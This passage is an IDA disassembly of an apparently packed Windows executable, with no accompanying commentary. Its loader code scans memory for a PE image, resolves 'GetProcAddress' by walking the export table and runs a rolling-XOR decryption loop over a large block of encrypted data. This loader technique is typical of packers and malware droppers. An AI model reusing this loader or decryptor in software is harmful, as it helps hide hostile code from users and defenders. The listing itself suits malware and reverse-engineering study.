loc_418022: ; CODE XREF: start+3D�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_418037
mov eax, [ebx+3Ch]
add eax, ebx
cmp word ptr [eax], 4550h
jz short loc_41803F
loc_418037: ; CODE XREF: start+29�j
sub ebx, 100h
jmp short loc_418022
; ---------------------------------------------------------------------------
loc_41803F: ; CODE XREF: start+35�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_41804D: ; CODE XREF: start:loc_418074�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_418074
cmp dword ptr [eax+3], 636F7250h
jnz short loc_418074
cmp dword ptr [eax+7], 72646441h
jnz short loc_418074
cmp dword ptr [eax+0Bh], 737365h
jz short loc_418079
loc_418074: ; CODE XREF: start+57�j start+60�j ...
loop loc_41804D
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418079: ; CODE XREF: start+72�j
sub [esp+0Ch+var_C], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_41809F+2
inc ebx
insb
outsd
jnb short near ptr loc_4180FD+2
dec eax
popa
outsb
db 64h
insb
loc_41809F: ; CODE XREF: start+90�p
add gs:[ebx-1], dl
start endp ; sp-analysis failed
setalc
mov [ebp+402407h], eax
call near ptr loc_4180BB+1
inc ebx
jb short loc_418117
popa
jz short loc_41811A
inc ebp
jbe short near ptr loc_41811C+1
outsb
jz short near ptr loc_4180FA+2
loc_4180BB: ; CODE XREF: seg002:004180AA�p
add [ebx-1], dl
setalc
mov [ebp+40240Bh], eax
call sub_4180D7
inc edi
db 65h
jz short loc_41811A
popa
jnb short sub_418145
inc ebp
jb short near ptr sub_418145+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_4180D7 proc near ; CODE XREF: seg002:004180C5�p
; FUNCTION CHUNK AT 00418155 SIZE 000000A1 BYTES
; FUNCTION CHUNK AT 004181F7 SIZE 0000000F BYTES
push ebx
call esi ; CloseServiceHandle
mov dword ptr ss:loc_40240F[ebp], eax
call sub_41812A
test eax, eax
jz short loc_41810A
push eax
call dword ptr ss:loc_40240F[ebp]
test eax, eax
jnz short loc_418104
lea eax, loc_401155[ebp]
loc_4180FA: ; CODE XREF: seg002:004180B9�j
mov dl, [eax-1]
loc_4180FD: ; CODE XREF: start+98�j
call sub_418145
jmp short loc_418155
; ---------------------------------------------------------------------------
loc_418104: ; CODE XREF: sub_4180D7+1B�j
call dword ptr [ebp+402407h]
loc_41810A: ; CODE XREF: sub_4180D7+10�j
pop ebp
retn
sub_4180D7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_41810C: ; CODE XREF: sub_41812A+2�p
pop edx
push 0
push 0
push 0
push 0
; ---------------------------------------------------------------------------
db 68h, 1
; ---------------------------------------------------------------------------
loc_418117: ; CODE XREF: seg002:004180B0�j
add [eax+eax], al
loc_41811A: ; CODE XREF: seg002:004180B3�j
; seg002:004180CB�j
mov eax, esp
loc_41811C: ; CODE XREF: seg002:004180B6�j
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
push esi
push esp
pop edi
xor eax, [eax]
; =============== S U B R O U T I N E =======================================
sub_41812A proc near ; CODE XREF: sub_4180D7+9�p
xor ecx, ecx
call loc_41810C
lea edx, loc_401125[ebp]
push edx
push ecx
push ecx
push eax
loc_41813B: ; CODE XREF: sub_4180D7+C9�j
call dword ptr [ebp+40240Bh]
add esp, 20h
retn
sub_41812A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418145 proc near ; CODE XREF: seg002:004180CF�j
; sub_4180D7:loc_4180FD�p ...
mov dh, dl
mov ecx, 12B2h ; CODE XREF: sub_4180D7+C0�j
loc_41814C: ; CODE XREF: sub_418145+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_41814C
retn
sub_418145 endp
; ---------------------------------------------------------------------------
db 0BDh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4180D7
loc_418155: ; CODE XREF: sub_4180D7+2B�j
db 3Eh
fbstp tbyte ptr [edi+2B6EF1E0h]
imul eax, [eax], -1Ah
or ebx, [ecx+ebx*4+5759056h]
loc_418166: ; CODE XREF: sub_4180D7+EE�j
pop esi
inc edi
les eax, [ecx+173D3D69h]
and [edi+56AF68ACh], ch ; CODE XREF: sub_4180D7+CD�j
mov bl, 79h
pop edx
xlat
sbb esp, esp
cmpsd
fxch7 st
inc ebp
xor [esi-0Fh], esi
test dl, ch
xchg eax, edi
xor ds:0DE8CBB5Bh, ch
fcomp qword ptr [ebx+1A2D4A58h] ; CODE XREF: sub_4180D7+12D�j
pop ss
sub eax, 15818386h
movsd
js short near ptr loc_418147+2
and eax, 6E286BAEh
in eax, 4Bh
jbe short loc_41813B
xchg eax, ebp
nop
js short near ptr loc_41816E+5
call far ptr 0DC20h:0FB480C47h
cmc
jb short loc_4181F7
aad 0F1h
and cx, [edx+5F82A59Dh]
mov ch, 0Eh ; CODE XREF: sub_4180D7+F5�j
or ecx, [ebp+45h] ; CODE XREF: sub_4180D7+E8�j
dec ebp
jnp short near ptr loc_4181BB+2
xchg cl, cl
or al, 27h
loopne loc_418166
out 0B4h, eax ; Interrupt Controller #2, 8259A
and [esi], ebx
push eax
ja short near ptr loc_4181B9+1
sbb eax, 87498CC9h
sub byte ptr cs:0A4F9B7BAh, 0Ch
mov edx, 3A112528h
mov ds:707F55FBh, eax
xchg dh, [esi]
in eax, dx
dec esp
xor bh, [esi+22h]
mov ch, 60h
arpl [edi+6Ch], si
jmp near ptr 21ED4A4Bh
; END OF FUNCTION CHUNK FOR sub_4180D7
; ---------------------------------------------------------------------------
db 13h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4180D7
loc_4181F7: ; CODE XREF: sub_4180D7+D7�j
add [edi+ebp], al
leave
push edi
pop edi
lodsd
cmp dword ptr [edi], 0A689B9FDh
jmp short near ptr loc_41818A+5
; END OF FUNCTION CHUNK FOR sub_4180D7
; ---------------------------------------------------------------------------
dw 272Ah
dd 9E7E6567h, 0FED69A18h, 94B97632h, 0F6507DAAh, 0EB2A71DCh
dd 0DF220D28h, 46E9599Dh, 0C74A698Bh, 3FF18101h, 500DCBACh
dd 0CBB62906h, 97DE1D60h, 630F113Eh, 7EA85244h, 73B7916Ch
dd 0F255ED31h, 5BDEC53Fh, 4E92DF70h, 5813360Ch, 0DF7AFD24h
dd 2B6EB1F1h, 0E09C0601h, 4A56F323h, 0D208733h, 0DFBD143Bh
dd 1ED975F8h, 0D89BEA6Fh, 0D71A1D84h, 3588D59Bh, 0B9EABA77h
dd 0FDF6397Ch, 0EBA66924h, 0D44BDE64h, 2D2557Ch, 0C3D03EF9h
dd 0FA73CE40h, 2B8A6289h, 0CCAB5428h, 53973EF4h, 0F4374E10h
dd 3B7E8120h, 0D12031F7h, 0A6ED5613h, 171AB977h, 844FE12Bh
dd 0BF61444Dh, 68B3F2BCh, 182A2D94h, 5E9160D4h, 0CF52765Fh
dd 0E799C407h, 0BE193DC0h, 24EF408Bh, 0DFC1F1EDh, 6DF0F15Ch
dd 1247F2AFh, 7BFE15DBh, 378B9D6Ah, 63CCE92Ch, 3DCAD94Ah
dd 601B2EEBh, 0BC82852Ch, 0A1E9938h, 0AC6AADA8h, 905ECB30h
dd 6556FF14h, 5144E3CCh, 0CE527DAAh, 812E71ECh, 204834A8h
dd 7083A6CCh, 980A0DB4h, 0B401C4DDh, 500FE6FCh, 0A353A493h
dd 2EDA5D70h, 8BCE175Bh, 0DA31EAC3h, 63B614BDh, 0E227ED70h
dd 5BDEF26Ah, 0DA1F35E7h, 43C6DE85h, 54EF4252h, 0C36EF1D0h
dd 1F62A5FEh, 7839F690h, 751AFDA5h, 9757F7ADh, 0B95712DDh
dd 865305CDh, 284A5DE1h, 8B2A4201h, 0A887CC88h, 0E3F67958h
dd 0CDCA4724h, 3C4BDE9Bh, 0AD2557Ch, 0BCB3568Ch, 21B897D6h
dd 17A7A62h, 4E4AB729h, 96D91Ch, 25EF8975h, 492EA671h
dd 431BC391h, 2303CE89h, 0CF62B6h, 804ED1F0h, 0A914D30Ch
dd 0C612FECh, 0A70EFE25h, 0CBDAE2A4h, 0C887AACFh, 0A90609A8h
dd 48F85780h, 0EBCA0AE1h, 9ECA9C68h, 0B841195Ch, 0A3C684B1h
dd 0EE415610h, 6FF2D14Bh, 0C6251F1Fh, 57DAF9D7h, 0B4D98514h
dd 7FA6B29Dh, 47B63CFCh, 0D9E9EBACh, 0E4B0D3E0h, 655AB1ACh
dd 0FC6CE3CCh, 0B71E1255h, 9FEEF4B4h, 3BCAF674h, 0E016599Fh
dd 0F7E9DC59h, 9F09C4BDh, 87873538h, 0AFD8E8EDh, 0C38A1D60h
dd 0DB9F4704h, 0EA3D5618h, 73F6DD0Fh, 13F32DB5h, 7FEA1E2Bh
dd 0B8175A10h, 0AB868928h, 0C8854309h, 2CFB4EA7h, 0F462E5CCh
dd 3B921844h, 504A8DD1h, 0DF39143Bh, 7EDB75F8h, 73D99650h
dd 0D74205F8h, 0CB0E49ADh, 0BF024E7Ch, 0B3F6397Dh, 0A7EA2D70h
dd 9BDE2164h, 70814309h, 0C3E21AD9h, 0DBE35640h, 90DB31B0h
dd 8610BCAh, 5C9EB2Fh, 32FEBF79h, 4F0DAD04h, 4117D98Ah
dd 4614EAECh, 513FE981h, 4A2BFDBDh, 9A30C6C8h, 0B5530DDDh
dd 0AA4F01D9h, 0B26E11C5h, 0CF5332F6h, 0A2633BCFh, 0C5AA58F4h
dd 0D88B521Bh, 0DCE2641Bh, 0E7B77C2Eh, 0EAAF5F35h, 2FDB752Bh
dd 0ED78750h, 11E5E948h, 32EEBC45h, 2EFCB940h, 7C82A169h
dd 4717DC8Eh, 4805F995h, 773BC988h, 5C60A6A8h, 7036E8A2h
dd 0F74E12A8h, 9F4709F1h, 0BA500DFCh, 94163DFDh, 0AE4C39F5h
dd 0CFBF24E8h, 0CD9B470Ch, 0D0835D19h, 0F29D1D21h, 0E7A75720h
dd 5AB562Dh, 16F1F959h, 0BC3AB44h, 36F7B541h, 2AD5D57Dh
dd 27E98478h, 7F1FD175h, 470ADF95h, 5862E48Dh, 7602EDB9h
dd 6E0CFDBDh, 9A70E4A8h, 0EF7310D5h, 0B7520CEBh, 876A30C5h
dd 8A6625F5h, 0CB670288h, 0C0845C2Ah, 0A7844219h, 0CDAA4423h
dd 0E6A1673Dh, 0FB836723h, 18F6FD01h, 2E29555h, 2DC3974Ah
dd 1E969865h, 2EDCBD71h, 5D31B661h, 4A1EDCBEh, 4616E6ECh
dd 7B33DB8Eh, 7B2FDCB1h, 982CECB8h, 837979FDh, 957A03D5h
dd 0A87B02CBh, 0BD4255EBh, 0B0632AE3h, 0F1C80EF3h, 0DF9D431Dh
dd 0F0907568h, 0E0A57C3Fh, 0E2843F63h, 28BE753Ch, 6F4815Dh
dd 17E78C40h, 35F3AF54h, 38EBA561h, 5AD1C549h, 5F1FFF88h
dd 4A03F995h, 770DA181h, 0F22F0BDh, 622BE799h, 92532BB0h
dd 0AD483EC3h, 0DF4709C1h, 0A76430CAh, 86662CE5h, 0D8912DE8h
dd 0C6806278h, 0CAA04C18h, 0D9DA780Ch, 0E1AA5020h, 2FB6763Dh
dd 1AC0904Eh, 2CD885Ch, 30F1B557h, 192BB7Dh, 26F48A78h
dd 711FC961h, 2B0BDD9Dh, 6D21D1A6h, 7622F8B9h, 6425FF80h
dd 0FB4DF2A1h, 9D7101F6h, 865208C9h, 0B4752FF0h, 8E7D22F1h
dd 0CB4C45F0h, 0E5865831h, 0E89D4819h, 0F8BB7202h, 0E1BD7C2Ch
dd 0CCB2474Ch, 27D49830h, 0ECD9E46h, 30F6965Bh, 53F8BC77h
dd 35DAB95Eh, 581BB56Bh, 5D1BE38Ch, 4F07DC98h, 7837F8ADh
dd 454EE8A6h, 9630D2BCh, 9A601CC8h, 865F19C2h, 0B67B2CC8h
dd 0CF6B27F7h, 966A3DDEh, 0D89954EEh, 0DFBD5410h, 0F88C4C1Ah
dd 0FD977608h, 0F3996423h, 1CD06836h, 2EE1A238h, 11C79D7Fh
dd 57EAA854h, 38E1BD77h, 5CEDB66Dh, 3302DC97h, 4904C293h
dd 1B2AC281h, 6726F0BFh, 6132FAA3h, 9A5B13B9h, 8E5C71D1h
dd 0AC2213CBh, 0D37237F9h, 0AC6922E3h, 0F2FE35E1h, 0DD974116h
dd 0E0924C02h, 0F2A9720Ch, 0EFA0701Ch, 36C26024h, 1D38D52h
dd 20DE885Eh, 34DD9541h, 2CF7BB76h, 10E2AC78h, 520EDC74h
dd 5F00F8F4h, 7A0CD78Dh, 7626D6A8h, 4E4ACCBEh, 895BF5AAh
dd 0A04610D6h, 0B6480CDCh, 0D75B31D2h, 0AE7A3FDDh, 0CB672BFAh
dd 0D7975C2Eh, 0C2864436h, 0CD9A6064h, 0BC9B4519h, 0CF82277Eh
dd 12E8FD0Ch, 4C2B253h, 3AE9805Bh, 36C4D965h, 22FA8277h
dd 421B8A6Ah, 2F33CDBDh, 7201CCBEh, 6E28F895h, 7E22F082h
dd 0BE3AC0ADh, 94532BBCh, 0B15E08E3h, 0BE6B0DC5h, 0CF532DDDh
dd 0E803A00Fh, 0B7926C48h, 26063174h, 0F5E10124h, 0C2D3735Ch
dd 82A05E00h, 0F0EECDCFh, 5E6A5ECh, 30F4B86Ch, 733148DFh
dd 8F0DD154h, 90173A04h, 0B076F9D8h, 70A9A534h, 0FC12469h
dd 0F0619598h, 6946E39Ch, 9CAF82C6h, 6E2E3190h, 8F5D1168h
dd 0D34E60F4h, 0ADDEC690h, 0D132CA84h, 0AFF25D7Ch, 0A18C297Ch
dd 0FFDA7732h, 8BCE496Dh, 2C930522h, 0D023066Ch, 38AAAD14h
dd 5C0B1E7Dh, 0CA92953Ch, 0C8CDBDF3h, 776E358Dh, 0A66252F4h
dd 5F72A57Dh, 44879ADCh, 8C987283h, 0BB1A1641h, 96BDF8B8h
dd 0B2669BFh, 28E5A2F8h, 0EF95D41Fh, 308F45C8h, 0B3F62ABAh
dd 58156A98h, 45BAA9Bh, 0AD2557Ch, 0ECD7D8Ch, 77A92ECFh
dd 949C1934h, 98291AD7h, 0BBC31A43h, 478ACD10h, 93934059h
dd 1C72F5E0h, 1DE32425h, 465ADDFCh, 5B1FC080h, 6ABDD499h
dd 0F3765D8Bh, 180E6937h, 9B3A6631h, 0CBD00898h, 0C3EE1C8Ch
dd 0EAFA3D80h, 0B339DCF5h, 60882528h, 8B748CD1h, 0D59A0D10h
dd 7B9A2189h, 0AB31F512h, 0E6618F20h, 57DAC5C8h, 0CE49F1D9h
dd 3FC2DDE2h, 335CB9D8h, 26006EADh, 28A1A08Eh, 0F056E627h
dd 77860CD9h, 0F7311530h, 3BA571B4h, 0E37266F3h, 0CA10EC11h
dd 7D814DD0h, 0BBFE4088h, 0AEFABFF3h, 5BE5296Ch, 1CBAD64Bh
dd 0EA68E29Fh, 9D85003Ch, 0F07412C9h, 0ECFDE2F7h, 9715B2F0h
dd 0FF88148h, 0BCEC9B5Dh, 13D128FFh, 0EFEDB1B4h, 20F72EE4h
dd 3856D9F8h, 0A00E07h, 0FB548603h, 0B8BB7550h, 764FAAAFh
dd 0D75A78A1h, 0C306D591h, 0F4085BBh, 0B263B066h, 50EA6D55h
dd 0FA9CAC86h, 0FA1BEBF2h, 6B93CAADh, 77BAFD40h, 0F3437069h
dd 0D4A2A531h, 13B3DC81h, 63F64E10h, 0BF71C10Ch, 2F72B541h
dd 216E456Dh, 7F0E9DE0h, 0B4E90D0h, 0DB151037h, 0FBD79FCh
dd 0E30EE93Dh, 8B1E61A5h, 0CBFA55F2h, 9506498Ch, 0E0FA69D2h
dd 8FBDA48Bh, 56D12528h, 92D28ED1h, 0D69B0D50h, 11EF032Eh
dd 6FB29D39h, 9CF4A92Ch, 17BEFAB5h, 0BD0B4714h, 6BD29E7Ch
dd 3377BD94h, 9395FAF0h
dd 1B5C81C0h, 0ECC76AD8h, 5A46C9E8h, 0E14EBD45h, 607E6557h
dd 8D220F7Ch, 2C400ECDh, 872EC205h, 7B7B1884h, 50A4E50Dh
dd 0E3C22EF9h, 0D38D9060h, 0CFA44606h, 7B558810h, 0D8B6F93Dh
dd 77C02D03h, 0B35127Dh, 1FC28548h, 0BCD4995Ch, 775E9295h
dd 23AA30F4h, 0E062A5EAh, 0EC5EBDA8h, 476E5E45h, 6EC1D2C4h
dd 0EF72516Bh, 0E322ABF1h, 0A2106320h, 46851795h, 0BF42510Ch
dd 267B209Fh, 0A7AA3D70h, 6488F067h, 8012918Ah, 83C716C4h
dd 673EF240h, 0EBAEF135h, 4FD7DF16h, 53A8595Ah, 468B491Fh
dd 5FEC104h, 6983C0D8h, 6A36976Dh, 552FDAAEh, 4D885E5Fh
dd 3169CAC9h, 0A23613EDh, 72D53EE6h, 0DB5E456Fh, 0C0D36EC1h
dd 0C3069609h, 857FB080h, 0C1EE7168h, 9FEE4D68h, 0C086195Ch
dd 0A30198AFh, 77830104h, 60B2F538h, 63A656A9h, 572B3420h
dd 750FD114h, 69CB9758h, 33D33CF3h, 0E1E9ADF0h, 16620DECh
dd 0FCB11D7h, 237A89CCh, 0CB968EB5h, 67AB7E8Eh, 722265A8h
dd 0F3367991h, 0A02B70B0h, 0C48B35E1h, 0DAD209D4h, 5C98A810h
dd 0E3AE7540h, 0F54F6021h, 50F8754Bh, 0B5DE8C13h, 68AA1277h
dd 7C8E5B15h, 0AD65D518h, 0C013365Eh, 47AFD24h, 7B3EE134h
dd 1F6B4DB8h, 7C1299DCh, 6826E3A7h, 43EE5A5h, 0AF16AE2Dh
dd 97E6ECACh, 5ED36E96h, 8B2B5411h, 0BF6A1488h, 0E276397Eh
dd 58BA7B21h, 0DBFAFEF1h, 1D479858h, 0D3C64955h, 26EE3473h
dd 3AFFA364h, 7B9570D7h, 5711D95Ch, 401F3234h, 0C37E8120h
dd 58FF353Bh, 2266E9F8h, 58095E19h, 4A19C592h, 0B21EC09Ah
dd 9C441AD5h, 934C02C3h, 0B57736F8h, 0BC653AFCh, 0B1730AD0h
dd 0C39458F2h, 0D89C5422h, 0C38C4A01h, 0FFA66119h, 0F5AF7F3Fh
dd 12D05444h, 27D78049h, 63D29A43h, 0A765DD22h, 4B8ED114h
dd 47EDB778h, 1D17D495h, 4009DF99h, 633FCD85h, 6322BBA1h
dd 400FC7CCh, 9C515D8Bh, 9B5F17CDh, 8A280CD9h, 0F3441CCFh
dd 0F7387DF9h, 9BCF71B1h, 8FDC1556h, 0ECAC7656h, 0B1FA5329h
dd 0FFBC7822h, 97970F3Dh, 73B6F93Ch, 23476C6Dh, 9D9EA138h
dd 0F86A29Dh, 0D679C90Ch, 373A995Bh, 5F715935h, 947CCFD4h
dd 53728269h, 3BE6D4D0h, 9D14F4EAh, 0F2CD4B39h, 5EAB4AD9h
dd 0D75A795Bh, 9C0C271Fh, 32A7232Dh, 0F3D576F9h, 0D26FA270h
dd 61DE6147h, 32853D1h, 323DF702h, 9C751F41h, 0F42B7C77h
dd 0FA2A53Ch, 55FCD976h, 63E158EFh, 47FDC144h, 5A76BDDCh
dd 236241C7h, 51099DE0h, 9EB19197h, 0FF02A187h, 0CCA3554h
dd 0E72D854Fh, 9D4D61A4h, 9C5D0ADBh, 8C93B68Ch, 5FFA7DA4h
dd 5411CD41h, 60166C80h, 0F15BE6A3h, 6FCA4D42h, 7BBE014Fh
dd 3DF7A66Dh, 2788DB1Fh, 0A89A916Ch, 0BAAB281h, 3F882D08h
dd 4001B9FCh, 4903DF80h, 1B1FC790h, 1CC76A88h, 8A46C9E8h
dd 0B71E6245h, 661F7EB4h, 9F35EC25h, 0D293D09Ch, 960A0DB5h
dd 9F9DD47Bh, 0C7613538h, 0A3E62968h, 804CA8EDh, 6971114h
dd 3FE6E2F5h, 84F0113Ch, 0A0CC12CFh, 1B8517A1h, 0CC622A18h
dd 39D31A9h, 0A2F7BD00h, 2B2EAA42h, 1E08F1B8h, 7B0499B6h
dd 874A8DD2h, 0DFD5143Bh, 2FB775F8h, 6E041CF6h, 9701B42Dh
dd 0CD640394h, 0A4F4F005h, 0E5A2393Ch, 0F5BB7D20h, 0BF31B49Bh
dd 708A1518h, 0C3E2EED9h, 7F3F3B40h, 6BAEB113h, 5FA2E9C0h
dd 1CC58E1Ch, 75B98653h, 7732852Ah, 4CE74AF8h, 0B066E9C8h
dd 175A9A88h, 0E6FB1CD4h, 0A642C5DEh, 0D781C431h, 26C26DF0h
dd 33E19E52h, 0CF125594h, 8A4800DBh, 99AE78CEh, 0ABA27D30h
dd 0BB81B097h, 5353191Ch, 862D895Fh, 132D0144h, 6FB2F53Dh
dd 748D5CA1h, 0DAC3DD60h, 0BAA02A9h, 0C9082D08h, 8EF54603h
dd 272A8927h, 0D9DAAEE4h, 8E5295D9h, 3471920h, 0F65229C0h
dd 142E71B5h, 9F06D23Dh, 43D2D89Ch, 970A4D91h, 0BB94950Fh
dd 7867CA2Ah, 26E66948h, 9AAF44A0h, 8BDD993Ch, 0FC57FA48h
dd 98B6B918h, 9F176ED2h, 5B9EA13Fh, 0CA1FFC6Dh, 43C6D2F0h
dd 0F4EF4250h, 0AE6EF1D0h, 24E6AA28h, 985699DDh, 7C18190h
dd 7EB1B13Bh, 0EF726E40h, 0C42EEC6Ah, 0BD1B5DE0h, 0A10F3B94h
dd 7097BA8Ah, 30F67958h, 23E5D288h, 9BDE2076h, 7B4798CBh
dd 0E9C64957h, 88E9AF50h, 2B8A4EA1h, 50626028h, 53962B99h
dd 51374010h, 8A7E8118h, 0D5B25DF0h, 0B70E5613h, 495A9DE0h
dd 3FC777FFh, 6ABDD1ECh, 0F3765DE3h, 0FB0ED03Dh, 0DAAF61E4h
dd 30E8F470h, 0E742C273h, 0BF1AFC90h, 0AFCA757Fh, 94EAC5A9h
dd 0C3DE3D18h, 87CA08B8h, 4D902444h, 90E5F540h, 2382F6B9h
dd 5B5E5E20h, 6B8896D2h, 23935085h, 331CB9BCh, 276A8C98h
dd 0E40DF3E4h, 4F765E4Dh, 273A04CCh, 62C52AD4h, 0EB6E5597h
dd 0D51A616Eh, 831633DCh, 52F51EC7h, 0BBBE654Fh, 127FD37Bh
dd 0A3A6355Eh, 9BB21D0Ah, 0DCCE1154h, 0B457FA1Bh, 4EB6B918h
dd 67AAED3Ch, 0EE13AC51h, 4FD2F011h, 648E4481h, 0F951BD40h
dd 7D3FB19Eh, 0D8F75ABBh, 9056D9F8h, 28348D28h, 76C00A55h
dd 0AF177C0Dh, 112BD9ACh, 0B70A280Eh, 34F4A67Ch, 0A8702477h
dd 0C47B309Fh, 2C00C671h, 16100AABh, 0CFF71CE5h, 462FA4Ch
dd 240316B7h, 4F1564CBh, 0E222E568h, 53D6CD6Bh, 2FA0B911h
dd 3B7EB434h, 0BF12007h, 9EE6A9ACh, 171ABAE8h, 0CC5FE5D4h
dd 0BF597D4Dh, 0F33679BCh, 0EFAFABB0h, 0DB1E2183h, 30EC0371h
dd 43838E73h, 0B7FA7D94h, 0F66E3174h, 12E221AAh, 0D3F110E9h
dd 12355B50h, 7BFE2507h, 604D0DBBh, 63A652A8h, 5A1F5420h
dd 218E913Ch, 0AA7D9308h, 33369D87h, 0A3656D75h, 1B5EA140h
dd 5F0255F3h, 69168AA6h, 0F73A15C1h, 1478B1B4h, 9F06423Dh
dd 2CEEDA9Ch, 0C5EEC99Fh, 3E774184h, 0AFB21D69h, 8BF3A4E1h
dd 2571D20h, 8B8E3949h, 7FA85719h, 3823066Ch, 0E4AAAD14h
dd 0DF911EDCh, 4F92D7AAh, 0F679C966h, 373A9511h, 0F29240Bh
dd 0E7E1A5A8h, 88D29623h, 8E4A8DD2h, 0BB16A441h, 0ECFB46B8h
dd 0B276386Fh, 284B59CAh, 8B264021h, 9497BA88h, 36F67958h
dd 0D06E22B0h, 0A8DE2166h, 0A6579C91h, 0D2C64964h, 68D2AC11h
dd 3BAEFE34h, 7BC570D7h, 9313D95Ch, 45BA491Fh, 0BEF7C104h
dd 2F329DD5h, 1B2D222Fh, 1702A558h, 89CA2D4h, 8B37209h
dd 0C6B3F05Dh, 6C2A2D98h, 0DDA65DEFh, 0FC12558Ch, 34C74A5Eh
dd 3E1BCA71h, 0EBC600F1h, 28EDE668h, 702F1F17h, 9F998066h
dd 6FFDB64Bh, 4FB253Bh, 0B3A5C1EDh, 20C5E7A1h, 3F77BF7Dh
dd 45018C16h, 0EC04B8F0h, 0AC56E67Bh, 595DB5A6h, 471618C8h
dd 209F7E33h, 0D2BF4601h, 282E319Ch, 0FB66EEF1h, 6B9ED090h
dd 0F40A4D90h, 74758244h, 127F3E93h, 0A3A60E65h, 0A405969Ch
dd 0EAF2BD9Dh, 5FE033Ah, 539AFB4Bh, 13F6D19Ah, 2FB0DDC8h
dd 3A92E9C5h, 0C84E2AE4h, 6F3F8001h, 201AB1B1h, 4D21F6D5h
dd 5AD396DCh, 8CB5722Fh, 0B269BCC7h, 6B3D36F6h, 1CD99690h
dd 82590A9Dh, 0FA8A5EDAh, 82FDBA77h, 81C57A2Bh, 58CCA97Fh
dd 0CBE3DE9Bh, 809D410Bh, 7C3912C8h, 9F61CEBFh, 94510F77h
dd 0A0AC6127h, 81A526E3h, 478ADBF8h, 0C4102904h, 2F9A4A07h
dd 7E66A9ECh, 36E97061h, 0F2A79194h, 9B4285C8h, 46BD4B43h
dd 0E76A459Dh, 0BD3CE8C0h, 955F6B19h, 0C3E4CC83h, 0E9713D80h
dd 0CD303248h, 0DAB21EE9h, 93049C53h, 0C43D0D50h, 7B9E0152h
dd 0AA37FA38h, 95A6E92Ch, 58988163h, 4B8E6A90h, 1FFC4408h
dd 135699DCh, 27C429FFh
dd 0D4B6A1E4h, 0AD6A26h, 3462A4Eh, 9AD95C0h, 49C68E4Bh
dd 542265A8h, 933E6801h, 3ABFA590h, 3FF1BE7Bh, 0AFF235F0h
dd 8BCB9CE7h, 0C9511D20h, 63101268h, 803DFBD6h, 39378F4Eh
dd 67AA8D14h, 0D606AC4h, 0C286AF1Bh, 396C9B9h, 2700BE00h
dd 2B6BB04Dh, 0BA91F2E8h, 11B59A6Dh, 59152923h, 690F8E96h
dd 0EE67F235h, 0B3AE69ACh, 39D1B55Fh, 4054AE6Bh, 0F50149C2h
dd 0B6B7B46Ch, 2EC26E5Bh, 0DD193323h, 0AFF23578h, 0AB8D806Ch
dd 0FCAAB7CBh, 2B86C0B1h, 57E8DC28h, 191FDA6Fh, 57C8CC18h
dd 3B26A287h, 7473073h, 6167A9ACh, 47199CE8h, 802A43E7h
dd 0FDCDE1EAh, 0E28BFAE4h, 0E72A2D98h, 26FCE5ABh, 7AEDAA67h
dd 0C34661A1h, 937DA87Fh, 1E113134h, 9FA20D41h, 0B7D18CA3h
dd 0A470D10h, 7BFE2951h, 47AF60B5h, 31F7E96Ch, 0E265DD4Ah
dd 4BCEF905h, 1BFD50F7h, 8689B9BCh, 272A85E1h, 3F59341Bh
dd 0BADF9598h, 306AEC5h, 0DF37C83Fh, 147871F4h, 9F061E3Dh
dd 0C2B3DA9Ch, 0C70A0DB8h, 0BBFEA947h, 0C5AF3578h, 8D0BA86Dh
dd 0CFDA5D43h, 0E0F1EA4h, 7F8211C8h, 0F07539B9h, 685A12F8h
dd 4F1E64E5h, 7251D558h, 43ACC91Ch, 0B61CA175h, 47629588h
dd 7F71D099h, 0ECA95D34h, 0EF4FF82Fh, 4C17C06h, 10CDA750h
dd 1C080853h, 0E34C258Dh, 61E63186h, 0CAFDBA77h, 97B2B245h
dd 0AE5FA040h, 10DE6143h, 0EB41D08h, 0F0C40F76h, 77D2AB65h
dd 0E0AE0E34h, 0DA28FECh, 0E003264Ch, 0C48A8D34h, 5FFC9C0h
dd 734D8AA4h, 0E5E5AA99h, 0EA2E75E4h, 8FA66E2Bh, 9EBD7A37h
dd 0F3365C04h, 0C892AEB0h, 331E61A4h, 0CF125588h, 7B06694Eh
dd 0B7FA3DB0h, 0ABEE329Ch, 9FC6E768h, 9FF24DD1h, 7F49239Dh
dd 1BA77D44h, 6FB2F5D0h, 47F2622Ch, 4D118010h, 687F3C95h
dd 3B6AC548h, 52894608h, 6AA932h, 7Eh dup(0)
dd 1280h dup(?)
seg002 ends
; Section 4. (virtual address 0001E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 41E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start